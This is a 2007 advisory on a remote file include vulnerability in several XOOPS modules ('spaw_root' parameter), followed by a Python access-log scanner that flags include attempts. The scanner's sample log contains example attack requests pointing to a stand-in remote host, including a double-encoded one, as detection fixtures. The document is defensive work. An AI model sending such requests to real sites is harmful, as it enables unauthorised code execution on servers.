Release Date: Jul 04, 2007
Severity: low
Impact: System compromise.
Description: Multiple XOOPS modules have a remote file include vulnerability. A remote attacker could execute an arbitrary script on the web server with the privileges of the server, via a specially crafted URL request to the 'spaw_control.class.php' script, using the 'spaw_root' parameter to specify a malicious PHP file from a remote system.
Affected Products: XT-Conteudo (module for Xoops) version 1.52 and prior; Tiny Content (module for Xoops) version 1.5 and prior; Cjay Content (module for Xoops) version 3 and prior; WiwiMod (module for Xoops) version 0.4 and prior; iContent (module for XOOPS) version 4.5 and prior.
Recommended Actions: Currently we are not aware of any officially supplied fix for this issue.
Coverage: IPS, VCM
Common Vulnerabilities and Exposures (CVE): CVE-2007-3057, CVE-2007-3220, CVE-2007-3221, CVE-2007-3237, CVE-2007-3289
Reference/s: http://www.securityfocus.com/bid/24470 (BugTraq); http://www.securityfocus.com/bid/24302 (BugTraq)
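
One way to look for attempts against this issue in web server access logs, as an added example that is not part of the original advisory: it flags requests to 'spaw_control.class.php' whose 'spaw_root' value points off-host, including double-encoded values. The log lines, paths and host names are constructed, and the rule that a legitimate value is a local path is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET_SCRIPT = "spaw_control.class.php"   # script named in the advisory
TARGET_PARAM = "spaw_root"                 # parameter named in the advisory
# Assumption: a legitimate value is a local path, so a URL scheme, a
# protocol-relative "//" or a UNC "\\" prefix marks a remote include target.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format); paths and hosts are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2007:10:00:00 +0000] "GET /modules/example/spaw/spaw_control.class.php?spaw_root=http://files.example.invalid/a.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [04/Jul/2007:10:00:05 +0000] "GET /modules/example/spaw/spaw_control.class.php?spaw_root=../spaw/ HTTP/1.1" 200 512',
    '192.0.2.12 - - [04/Jul/2007:10:00:09 +0000] "GET /modules/example/spaw/spaw_control.class.php?spaw_root=%2568ttp%253A%252F%252Ffiles.example.invalid%252Fa.txt HTTP/1.1" 200 512',
    '192.0.2.13 - - [04/Jul/2007:10:00:12 +0000] "GET /index.php?url=http://www.example.invalid/ HTTP/1.1" 200 2048',
]

def _decode(value, rounds=3):
    """Undo repeated percent-encoding so %2568ttp:// is still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_spaw_root(log_line):
    """Return the decoded spaw_root value if the request looks like a remote include attempt."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not _decode(url.path).lower().endswith("/" + TARGET_SCRIPT):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() == TARGET_PARAM:
            value = _decode(value)  # parse_qsl already decoded one layer
            if REMOTE_VALUE.match(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    return [(n, v) for n, v in ((i, suspicious_spaw_root(l)) for i, l in enumerate(lines, 1)) if v]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {TARGET_PARAM} -> {value}")
```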